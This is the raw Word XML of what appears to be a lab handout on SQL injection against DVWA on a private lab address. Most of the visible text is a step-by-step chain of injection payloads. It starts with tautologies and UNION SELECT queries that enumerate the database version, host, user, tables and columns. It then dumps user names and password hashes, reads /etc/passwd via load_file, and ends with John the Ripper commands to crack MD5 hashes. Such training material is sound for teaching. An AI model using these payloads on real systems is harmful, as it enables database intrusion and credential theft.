      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:sz w:val="14"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FF9AF32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SQL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syntax error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to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check corresponds MySQL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server version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for the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right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syntax **</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C2EBFB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8E3B55B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select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first_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>,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last_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t xml:space="preserve"> from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users where</w:t>
      </w:r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user_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t xml:space="preserve"> ='%'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'1'='1';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B12E3E" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3247AD42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URL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Injection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02CE8151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4743A6B7" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="90"/>
        <w:ind w:left="233" w:right="2194"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:hyperlink r:id="rId22">
        <w:r>
          <w:rPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
          </w:rPr>
          <w:t>http://172.16.15.128/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit#</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-58"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId23">
        <w:r>
          <w:rPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
          </w:rPr>
          <w:t>http://172.16.15.128/dvwa/vulnerabilities/sqli/?id=2&amp;Submit=Submit#</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-58"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId24">
        <w:r>
          <w:rPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
          </w:rPr>
          <w:t>http://172.16.15.128/dvwa/vulnerabilities/sqli/?id=3&amp;Submit=Submit#</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-58"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId25">
        <w:r>
          <w:rPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
          </w:rPr>
          <w:t>http://172.16.15.128/dvwa/vulnerabilities/sqli/?id=4&amp;Submit=Submit#</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-58"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId26">
        <w:r>
          <w:rPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
          </w:rPr>
          <w:t>http://172.16.15.128/dvwa/vulnerabilities/sqli/?id=5&amp;Submit=Submit#</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="095F8D5B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1BEA27E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Payload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Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796C8BB8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54390AC7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Display the name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of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the Version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of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Database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2B5F54BA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034234A6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 select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null, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>version(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>)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#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DEA65F3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4455E41C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Display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Hostname</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:shd w:val="clear" w:color="auto" w:fill="00FF00"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="00FF00"/>
        </w:rPr>
        <w:t>of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Database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2E1CE5EF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25ADBA8C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select null,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@@hostname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#'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DA5398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16C5B3AE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Display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database username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name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398ADC4C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1F323165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 select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null, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>user(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>)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#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639DA4BD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1C5D794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Display the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database</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="00FF00"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="00FF00"/>
        </w:rPr>
        <w:t>name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from which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web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app is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running **</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DEC1858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56E97B3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select null,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1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database(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>)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#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBE7C8D" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CBD14DA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select</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1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database(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>),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user()#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD5AAC4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4C04E430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00FF00"/>
        </w:rPr>
        <w:t>**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List all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the tables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in the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:shd w:val="clear" w:color="auto" w:fill="00FF00"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="00FF00"/>
        </w:rPr>
        <w:t>information schema</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="00FF00"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="00FF00"/>
        </w:rPr>
        <w:t>**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B2EE1C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55659EDB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1=0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select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null,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table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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-1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information_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>schema.tables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t xml:space="preserve"> #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368C2CF9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AA61823" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="90"/>
        <w:ind w:left="233" w:right="232"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>%'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select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table_name,2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16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information_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>schema.tables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/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where</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1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table_schema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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-57"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>'#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F8BBBA" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31468D36" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="90"/>
        <w:ind w:left="233"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>%'</w:t>
      </w:r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and</w:t>
      </w:r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1=0</w:t>
      </w:r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union</w:t>
      </w:r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select</w:t>
      </w:r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null,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5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table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="53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5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information_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>schema.tables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="52"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>where</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-57"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>table_schema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t xml:space="preserve"> =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'owasp10'#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA424C2" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:sectPr w:rsidR="00230D57" w:rsidSect="009B67ED">
          <w:pgSz w:w="11910" w:h="16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230D57" w14:paraId="04E47E5A" w14:textId="77777777" w:rsidTr="00B25987">
        <w:trPr>
          <w:trHeight w:val="7728"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9018" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06232602" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00B2598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0D75D433" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00B2598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List all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 Users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tables in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information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schema **</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C5A6837" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00B25987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35CEEF5" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00B25987">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:right="93"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-1"/>
                <w:sz w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
              </w:rPr>
              <w:t>%'</w:t>
            </w:r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spacing w:val="-1"/>
                <w:sz w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
              </w:rPr>
              <w:t>and</w:t>
            </w:r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spacing w:val="-1"/>
                <w:sz w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
              </w:rPr>
              <w:t>1=0</w:t>
            </w:r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spacing w:val="-1"/>
                <w:sz w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
              </w:rPr>
              <w:t>union</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-1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select</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-1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null,</w:t>
            </w:r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table_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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from</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-14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information_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
              </w:rPr>
              <w:t>schema.tables</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-15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where</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-17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table_name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like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'user%'#</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F47F2EA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563EC08A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List all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 Column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Name of</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-3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 Users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tables **</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="406D5D8D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3EAAC7E2" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00B25987">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="635"/>
                <w:tab w:val="left" w:pos="1266"/>
                <w:tab w:val="left" w:pos="1928"/>
                <w:tab w:val="left" w:pos="2763"/>
                <w:tab w:val="left" w:pos="3593"/>
                <w:tab w:val="left" w:pos="4312"/>
                <w:tab w:val="left" w:pos="8434"/>
              </w:tabs>
              <w:ind w:right="103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z w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
              </w:rPr>
              <w:tab/>
              <w:t>and</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
              </w:rPr>
              <w:tab/>
              <w:t>1=0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
              </w:rPr>
              <w:tab/>
              <w:t>union</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
              </w:rPr>
              <w:tab/>
              <w:t>select</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
              </w:rPr>
              <w:tab/>
              <w:t>null,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
              </w:rPr>
              <w:t>concat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
              </w:rPr>
              <w:t>(table_name,0x0</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
              </w:rPr>
              <w:t>a,column</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
              </w:rPr>
              <w:t>_name)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-1"/>
                <w:sz w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFF00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information_schema.columns</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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where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table_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
              </w:rPr>
              <w:t xml:space="preserve"> = 'users' #</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38C304E4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2C9F65DD" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00B25987"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pacing w:val="39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union</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="4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select</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="4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1,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="39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group_concat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
              </w:rPr>
              <w:t>(column_name,0x0a)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="40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from</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="41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information_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
              </w:rPr>
              <w:t>schema.columns</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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where</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-3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table_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:spacing w:val="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=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'users' #</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A138A40" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00B25987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5AABB794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Display all the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Column Content of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Users tables **</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08AE8C33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2B45356E" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00B25987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pacing w:val="36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union</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="36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select</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="37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column_name,2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="35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from</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="36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information_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
              </w:rPr>
              <w:t>schema.columns</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:spacing w:val="37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where</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="34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table_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:spacing w:val="39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'users'#</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="191F7995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6787FA94" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00B25987">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:right="92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pacing w:val="1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and</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="1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1=0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="14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union</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="15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select</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="15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null,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="14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concat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
              </w:rPr>
              <w:t>(first_name,0x0</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
              </w:rPr>
              <w:t>a,last</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
              </w:rPr>
              <w:t>_name,0x0a,user,0x0a,password)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from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users #</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66A4FB78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62502686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union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select 1,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group_concat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
              </w:rPr>
              <w:t>(user,0x0</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
              </w:rPr>
              <w:t>a,password</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
              </w:rPr>
              <w:t>)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from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users #</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37E2CD27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12E52F48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**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Extract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Storage</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2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Password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**</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D539606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0AAF5F37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%'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and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1=0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union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 xml:space="preserve">select </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
              </w:rPr>
              <w:t>load_file</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
              </w:rPr>
              <w:t>('/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
              </w:rPr>
              <w:t>etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
              </w:rPr>
              <w:t>/passwd'),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null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#</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00230D57" w14:paraId="5FC7F74E" w14:textId="77777777" w:rsidTr="00B25987">
        <w:trPr>
          <w:trHeight w:val="275"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9018" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4CCFED1B" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00B2598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  <w:shd w:val="clear" w:color="auto" w:fill="00FF00"/>
              </w:rPr>
              <w:t>John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the</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-1"/>
                <w:sz w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="00FF00"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="00FF00"/>
              </w:rPr>
              <w:t>Ripper</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00230D57" w14:paraId="7B8E3751" w14:textId="77777777" w:rsidTr="00B25987">
        <w:trPr>
          <w:trHeight w:val="1379"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9018" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="156744A7" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00B2598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  <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
              </w:rPr>
              <w:t>Save</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2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the</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-1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hash in</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-1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text</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-1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file</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="1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for</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-3"/>
                <w:sz w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
              </w:rPr>
              <w:t>Decryption</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35C181ED" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00B25987">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5BA230F8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john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-h</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="783D8C0E" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00B25987">
            <w:pPr>
              <w:pStyle w:val="TableParagraph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john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hash.txt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--format=Raw-MD5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C32FFDA" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00B25987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  <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
              </w:rPr>
              <w:t>john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hash.txt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--show</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-3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--format=Raw-MD5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00230D57" w14:paraId="37D6E295" w14:textId="77777777" w:rsidTr="00B25987">
        <w:trPr>
          <w:trHeight w:val="275"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9018" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19ED18A3" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00B25987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00FFFF"/>
              </w:rPr>
              <w:t>Hashcat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
